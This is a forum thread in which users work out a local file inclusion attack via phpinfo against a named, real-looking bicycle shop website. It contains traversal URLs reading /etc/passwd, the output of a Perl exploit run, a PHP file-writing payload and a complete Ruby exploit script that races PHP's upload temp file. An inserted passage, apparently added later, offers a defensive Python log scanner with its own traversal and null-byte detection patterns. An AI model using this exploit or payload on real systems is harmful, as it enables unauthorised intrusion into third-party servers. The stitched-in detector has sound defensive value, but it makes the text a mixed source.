Help with LFI via phpinfo

Discussion in 'Vulnerabilities' started by psihoz26, 19 Sep 2013.

  1. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    546
    Likes Received:
    159
    Reputations:
    324
    link to phpinfo
    http://www.cloud9(АНТИГУГОЛ)cycles.com/info.php

    link with the include
    http://www.cloud9(АНТИГУГОЛ)cycles.com/index.php?content=../../../../../../etc/passwd%00

    I'm using the LFI-via-phpinfo exploit
    taken from here
    https://rdot.org/forum/showpost.php?p=12621&postcount=2



    Code:
    C:\Windows\system32>perl C:\lfi.pl http://www.cloud9(АНТИГУГОЛ)cycles.com/info.php http://w
    ww.cloud9(АНТИГУГОЛ)cycles.com/index.php?content=../../../../../../etc/passwd%00
    Generating huge headers         [headers ready]
    Setting buffer size             [512]
    Sending request                 [request sent]
    HTTP/1.1 200 OK
    Reading.........................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ......................................
    Got filename: /tmp/phpROHVzd
    Including...
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN">
    <html>
            <head>
                    <title>Cloud 9 Cycles</title>
                    <meta http-equiv="content-type" content="text/html; charset=utf-
    8">
                    <meta http-equiv="Content-Script-Type" content="text/javascript"
    />
                    <meta name="description" content="" />
                    <script type="text/javascript">
                            <!--
                                    if (top.location!= self.location) {
                                            top.location = self.location.href
                                    }
                            //-->
                    </script>
                    <script type="text/javascript" src="fx/js/jquery-1.3.2.js"></scr
    ipt>
                    <script type="text/javascript" src="fx/js/jquery.easing.1.3.js">
    </script>
                    <script type="text/javascript" src="fx/js/jquery.fancybox-1.3.1.
    pack.js"></script>
                    <script type="text/javascript" src="fx/js/pngfix.js"></script>
                    <script type="text/javascript" src="fx/js/skrypty.js"></script>
    
    
    
                    <link href="fx/css/jquery.fancybox-1.3.1.css" type="text/css" re
    l="stylesheet" media="screen" />
                <link href="fx/css/main.css" type="text/css" rel="stylesheet" />
            </head>
            <body class="avant" style="background: url(fx/gfx/bg/../../../../../../t
    mp/phpROHVzd .jpg) center no-repeat #000 fixed ">
    
    
    
                    <div id="kontener">
                            <div id="top">
                            <div style="position: relative; top: 8px; left: 15px">
            <a href="http://www.facebook.com/pages/Cloud-9-Cycles/158029180960878"><
    img style="margin: 0px 10px 0 0px;" src="fx/gfx/fb.gif"></a>
            <a href="http://twitter.com/#!/Cloud9cycles"><img style="margin: 0px 520
    px 0 0px;" src="fx/gfx/tw.gif"></a>
                                    <a href="https://twitter.com/Cloud9Cycles" class
    ="twitter-follow-button"  data-width="230px" data-button="grey" data-text-color=
    "#FFFFFF" data-link-color="#00AEFF">Follow @Cloud9Cycles</a>
            <script src="//platform.twitter.com/widgets.js" type="text/javascript"><
    /script>
            <iframe src="//www.facebook.com/plugins/like.php?href=http://www.faceboo
    k.com/pages/Cloud-9-Cycles/158029180960878&amp;send=false&amp;layout=button_coun
    t&amp;width=450&amp;show_faces=false&amp;action=like&amp;colorscheme=light&amp;f
    ont&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:h
    idden; width:85px; height:21px;" allowTransparency="true"></iframe>
             <div class="clear"></div>
    
                            </div>
            <a href="index.php?content=home" title="Back to home page"><img src="fx/
    gfx/logo.png" alt="Cloud9Cycles logo"></a>
    
                                    <div id="baner-menu-box">
                                            <div id="baner-top" ></div>
                                            <div id="menu">
                                                    <span>
                                                            <a href="index.php"
                                     title="Back to home page"         onmouseover="
    this.style.color='#fff'"        onmouseout="this.style.color='#000'">home</a>  -
    -
                                                            <a href="index.php?conte
    nt=custom"       title="Custom builds"               onmouseover="this.style.col
    or='#fff'"      onmouseout="this.style.color='#000'">custom builds</a>  --
                                                            <a href="index.php?conte
    nt=bikes"          title="Browse our Bikes"          onmouseover="this.style.col
    or='#fff'"      onmouseout="this.style.color='#000'">bikes</a>  --
                                                            <a href="index.php?conte
    nt=service"  title="Servicing"                         onmouseover="this.style.c
    olor='#fff'"    onmouseout="this.style.color='#000'">servicing</a>  --
                                                            <a href="index.php?conte
    nt=rent"           title="Rent a bike"                     onmouseover="this.sty
    le.color='#fff'"        onmouseout="this.style.color='#000'">bike rental</a>  --
    
                                                            <a href="http://www.clou
    d9cycles.blogspot.com"           title="Cloud 9 Cycles blog"     onmouseover="th
    is.style.color='#fff'"  onmouseout="this.style.color='#000'">blog</a>  --
                                                            <a href="index.php?conte
    nt=contact"  title="Contact us"                        onmouseover="this.style.c
    olor='#fff'"    onmouseout="this.style.color='#000'">contact us</a>
                                                    </span>
                                            </div>
                                            <div id="baner-bottom" ></div>
                                                                            </div>
                            </div>
                            <div class="clear"></div>
    
                            <div id="content">
                                    hello<br>
    
    Keeping file /tmp/phpROHVzd in tmp, use it as long as you need it
    ...............................................................................

    I'm trying to include /tmp/phpROHVzd

    http://www.cloud9(АНТИГУГОЛ)cycles.com/index.php?content=../../../../../../tmp/phpROHVzd%00

    and nothing comes of it =(
    What could the problem be??
     
  2. yobanet

    yobanet New Member

    Joined:
    22 Jul 2013
    Messages:
    5
    Likes Received:
    1
    Reputations:
    5
    Everything works, though the file in /tmp/ doesn't live long.
    I have a self-written exploit for phpinfo; as the payload I added this to it: <?php file_put_contents('/tmp/qwerty.lol','<?php phpinfo(); ?>'); ?>

    Result:

    http://www.cloud(дщд)9cycles.com/index.php?content=../../../../../../tmp/qwerty.lol%00
     
    1 person likes this.
  3. qaz

    qaz Elder - Elder

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    I'm not strong in Perl, but can someone explain what manipulations make it possible to create a file in the temp folder?
     
  4. yobanet

    yobanet New Member

    Joined:
    22 Jul 2013
    Messages:
    5
    Likes Received:
    1
    Reputations:
    5
    The manipulations that create files in /tmp are performed by phpinfo(); it's enough to pass the file contents to the script, something like that.
     
  5. qaz

    qaz Elder - Elder

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    Hmm, can someone explain in more detail? What parameters need to be passed?
     
  6. yobanet

    yobanet New Member

    Joined:
    22 Jul 2013
    Messages:
    5
    Likes Received:
    1
    Reputations:
    5
    Something like this, I don't know how to explain it.

    Code:
    require 'socket'
    require 'uri'
    require 'net/http'

    # pad a status message with dots so the [OK]/[ERROR] markers line up
    def printDotted(msg)
      print msg + "." * (50 - msg.length)
    end

    def main()
      # setting up
      puts "SETTING UP"

      target = 'http://www/phpinfo.php'        # phpinfo()
      lfi = 'http://www/include.php?file='     # LFI template like http://www.host.com/data/lfi.php?location={LFI}
      payloadLocation = 'payload.txt'          # payload
      junkFilesCount = 50                      # tail
      recvBufferSize = 1024                    # receive buffer size

      # just an echo for you
      printDotted(' -target:')
      print("[#{target}]\n")

      printDotted(' -lfi:')
      print("[#{lfi}]\n")

      printDotted(' -payload:')
      print("[#{payloadLocation}]\n")

      printDotted(' -junk files count:')
      print("[#{junkFilesCount}]\n")

      printDotted(' -receive buffer size:')
      print("[#{recvBufferSize}]\n")

      # try to load the payload
      begin
        printDotted('LOAD PAYLOAD')
        payload = IO.read(payloadLocation)
        print("[OK]\n")
      rescue
        print("[ERROR]\n")
        return
      end

      # multipart boundary; the body parts are prefixed with "--" as the header's value requires
      boundary = '---------------------------89q8834898293409rw29'

      # payload part of the multipart body
      file = "--#{boundary}\r\n"
      file += "Content-Disposition: form-data; name=\"file_loader\"; filename=\"\r\npayload.txt\"\r\n"
      file += "Content-Type: text/plain\r\n\r\n"
      file += "#{payload}\r\n"
      file += "--#{boundary}\r\n"

      # generate junk files (huge file names inflate the phpinfo() output)
      printDotted('PREPARE JUNK')

      junkFilesCount.times do
        file += "--#{boundary}\r\n"
        file += "Content-Disposition: form-data; name=\"file#{rand(10000)}\"; filename=\"\r\njunk#{rand(1000000).to_s * 10000}.txt\"\r\n"
        file += "Content-Type: text/plain\r\n\r\n"
        file += "superslow\r\n"
        file += "--#{boundary}\r\n"
      end

      print("[OK]\n")

      printDotted('prepare headers')

      targetURI = URI(target)
      query = targetURI.path
      # add the query string if present
      query += '?' + targetURI.query unless targetURI.query.nil?

      # headers
      req = "POST #{query} HTTP/1.0\r\n"
      req += "Content-Type: multipart/form-data; boundary=#{boundary}\r\n"
      req += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
      req += "User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\r\n"
      req += "Host: #{targetURI.host}\r\n"
      req += "Content-Length: #{file.bytesize}\r\n"   # bytesize, not length: the payload may contain multibyte characters
      req += "Connection: Close\r\n\r\n"
      req += file

      print("[OK]\n")

      # create a TCP socket
      sock = Socket.new(:INET, :STREAM)

      # and set the receive buffer size (kept small so the response is read slowly)
      sock.setsockopt(Socket::SOL_SOCKET, Socket::SO_RCVBUF, recvBufferSize)

      printDotted('connecting to')

      begin
        sock.connect(Socket.pack_sockaddr_in(targetURI.port, targetURI.host))
      rescue
        print("[ERROR]\n")
        return false
      end

      print("[OK]\n")

      sock.write(req)

      data = ''

      loop do
        printDotted("get next #{recvBufferSize} bytes")

        tmpData = sock.recv(recvBufferSize)

        print("[OK]\n")

        # recv returns an empty string at EOF (never nil), so stop on empty as well
        break if tmpData.nil? || tmpData.empty?

        data += tmpData

        # look for the payload's entry in the $_FILES dump inside the phpinfo() HTML
        tmpFileName = data.scan(/\[name\]\s=&gt;\spayload.txt\n\s\s\s\s\[type\]\s=&gt;\stext\/plain\n\s\s\s\s\[tmp_name\]\s=&gt;\s(.*?)\n\s\s\s\s\[error\]/)

        next if tmpFileName.empty?

        payloadFileName = tmpFileName[0][0].clone

        printDotted('payload file location:')
        print('[' + payloadFileName + ']' + "\n")

        lfiURI = URI(lfi + payloadFileName + '%00')

        printDotted("Include #{payloadFileName}")

        response = Net::HTTP.get_response(lfiURI)

        if response.is_a?(Net::HTTPOK)
          print("[OK]\n")
        else
          print("[ERROR]\n")
        end

        break
      end

      sock.close
    end

    main()

     
  7. попугай

    попугай Elder - Elder

    Joined:
    15 Jan 2008
    Messages:
    1,587
    Likes Received:
    405
    Reputations:
    196
    How small the internet is.
     
  8. qaz

    qaz Elder - Elder

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75

    The question still stands.
     
  9. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,037
    Likes Received:
    531
    Reputations:
    935
    lol ))) how did you write an exploit if you don't know how the vulnerability works? :D
     
  10. wacky

    wacky Member

    Joined:
    30 Jan 2012
    Messages:
    42
    Likes Received:
    7
    Reputations:
    6
    It's not phpinfo() that performs such "manipulations" but the interpreter; phpinfo merely serves as the link that, under certain circumstances, lets you see the path to the temporary file.
     
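From the defender's side, the mechanism wacky describes leaves a recognisable trace in web server logs: an include parameter carrying traversal sequences and a %00 terminator, a reference to PHP's upload temp-file naming (/tmp/php followed by six random characters), and a POST to a phpinfo page from the same client shortly before such an include. The script below is an added example, not code from this thread or from any of its posters; it scans Apache combined-format access log lines for those indicators and correlates the POST/include pair per client. The log lines are constructed (the temp-file name /tmp/phpROHVzd is the one shown in the thread, the addresses and timestamps are made up), and the phpinfo page-name pattern and the 120-second correlation window are assumptions.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import unquote

# Constructed sample lines in Apache "combined" format (not from the thread's server).
SAMPLE_LOG = """\
203.0.113.7 - - [19/Sep/2013:14:02:11 +0000] "GET /index.php?content=home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [19/Sep/2013:14:02:15 +0000] "GET /index.php?content=../../../../../../etc/passwd%00 HTTP/1.1" 200 1980 "-" "Mozilla/5.0"
203.0.113.7 - - [19/Sep/2013:14:02:40 +0000] "POST /info.php HTTP/1.0" 200 88340 "-" "Mozilla/5.0"
203.0.113.7 - - [19/Sep/2013:14:02:40 +0000] "GET /index.php?content=../../../../../../tmp/phpROHVzd%00 HTTP/1.1" 200 5300 "-" "Mozilla/5.0"
198.51.100.9 - - [19/Sep/2013:14:05:02 +0000] "GET /index.php?content=bikes HTTP/1.1" 200 6100 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# PHP names upload temp files "php" + six random characters in the upload_tmp_dir
TMPFILE_RE = re.compile(r'/tmp/php[A-Za-z0-9]{6}')
# Assumption: the phpinfo page is called info.php or phpinfo.php; adjust for your site
PHPINFO_RE = re.compile(r'/(?:php)?info\.php$', re.I)
# Assumption: a POST to phpinfo followed by a temp-file include within this window is one chain
CHAIN_WINDOW = timedelta(seconds=120)


def parse_line(line):
    """Split one combined-format line into ip, timestamp, method, target and status."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['ts'] = datetime.strptime(rec['ts'], '%d/%b/%Y:%H:%M:%S %z')
    return rec


def lfi_indicators(target):
    """Return the LFI-related indicators found in a (URL-encoded) request target."""
    decoded = unquote(target)   # %00 becomes a real NUL byte, %2e%2e%2f becomes ../
    tags = []
    if '../' in decoded or '..\\' in decoded:
        tags.append('path-traversal')
    if '\x00' in decoded:
        tags.append('null-byte')
    if TMPFILE_RE.search(decoded):
        tags.append('php-upload-tmpfile')
    if '/etc/passwd' in decoded:
        tags.append('sensitive-file')
    return tags


def analyze(log_text):
    """Scan log lines and return one finding per suspicious request, in log order."""
    findings = []
    last_phpinfo_post = {}   # client ip -> time of its most recent POST to a phpinfo page
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec['target'].split('?', 1)[0]
        tags = lfi_indicators(rec['target'])
        if rec['method'] == 'POST' and PHPINFO_RE.search(path):
            tags.append('phpinfo-post')
            last_phpinfo_post[rec['ip']] = rec['ts']
        if 'php-upload-tmpfile' in tags:
            earlier = last_phpinfo_post.get(rec['ip'])
            if earlier is not None and timedelta(0) <= rec['ts'] - earlier <= CHAIN_WINDOW:
                tags.append('phpinfo-lfi-chain')
        if tags:
            findings.append({'ip': rec['ip'], 'ts': rec['ts'].isoformat(),
                             'target': rec['target'], 'tags': tags})
    return findings


if __name__ == '__main__':
    for f in analyze(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['target']} -> {', '.join(f['tags'])}")
```

The per-client correlation is what separates this pattern from ordinary traversal scanning: a lone GET with ../ and %00 is a probe, but a POST to a phpinfo page immediately followed by an include of a /tmp/php* path from the same address is the race described in this thread and deserves a high-priority alert (and removal of the phpinfo page).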
  11. yobanet

    yobanet New Member

    Joined:
    22 Jul 2013
    Messages:
    5
    Likes Received:
    1
    Reputations:
    5
    I said that I can't explain it properly, not that I don't know how the vulnerability works. ;)
     